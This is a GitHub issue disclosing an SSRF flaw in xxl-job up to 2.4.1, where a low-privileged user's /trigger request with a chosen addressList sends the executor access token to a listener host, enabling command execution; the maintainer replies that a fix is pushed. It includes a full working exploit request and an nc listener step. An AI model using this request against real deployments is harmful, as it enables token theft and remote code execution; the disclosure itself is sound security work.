Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

xxl-job =< 2.4.1 version has SSRF vulnerability, which causes low-privileged users to control executor to RCE #3375

Closed
JOHN-FROD opened this issue Jan 11, 2024 · 1 comment
Closed

xxl-job =< 2.4.1 version has SSRF vulnerability, which causes low-privileged users to control executor to RCE #3375

JOHN-FROD opened this issue Jan 11, 2024 · 1 comment

Comments

@JOHN-FROD
Copy link

JOHN-FROD commented Jan 11, 2024
edited

Which version of XXL-JOB do you using?

2.4.1(latest)

vulnerability description

XXL-JOB is a distributed task scheduling platform based on java language in the XXL (XXL-JOB) community.
There is an SSRF vulnerability in xxl-job-2.4.1/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobInfoController.java of Xxl-job 2.4.1, which originates from /trigger, it directly sends a request to the address specified by addressList without judging whether the addressList parameter is the valid executor address. It can make the SSRF vulnerability, the attacker obtains XXL-JOB-ACCESS-TOKEN and calls any executor, causing the execution of arbitrary commands of the executor.
The /trigger interface call only needs to be a low Privilege user of the platform。

Steps to reproduce the behavior

condition:

  • XXL-JOB <= 2.4.1 (latest version)
  • Regular user account
  • Know a JobId (which can be obtained by traversal)
  1. Create a normal user normal without any executor permissions。
    image
    image
  2. When using the normal user to call the interface, set the input parameter addressList to the http server address , and print the XXL-JOB-ACCESS-TOKEN directly on the target server
POST /xxl-job-admin/jobinfo/trigger HTTP/1.1
Host: 10.248.28.212:8080
Content-Length: 69
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.248.28.212:8080
Referer: http://10.248.28.212:8080/xxl-job-admin/jobinfo
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a2274657374222c2270617373776f7264223a226531306164633339343962613539616262653536653035376632306638383365222c22726f6c65223a302c227065726d697373696f6e223a22227d
Connection: close

id=1&executorParam=test&addressList=http%3A%2F%2F10.248.28.212%3A9999

image
3. nc in vps
image
4. Use the token to call the task trigger interface of the executor Restful API to execute arbitrary commands

Other information

the vulnerability is similar to the CVE-2022-43183
@xuxueli xuxueli mentioned this issue Apr 17, 2024
Closed
@xuxueli
Copy link
Owner

xuxueli commented Apr 17, 2024

你好,相关修复逻辑已推送master分支,将会随 2.4.1 版本修复。

@xuxueli xuxueli closed this as completed Apr 17, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@xuxueli @JOHN-FROD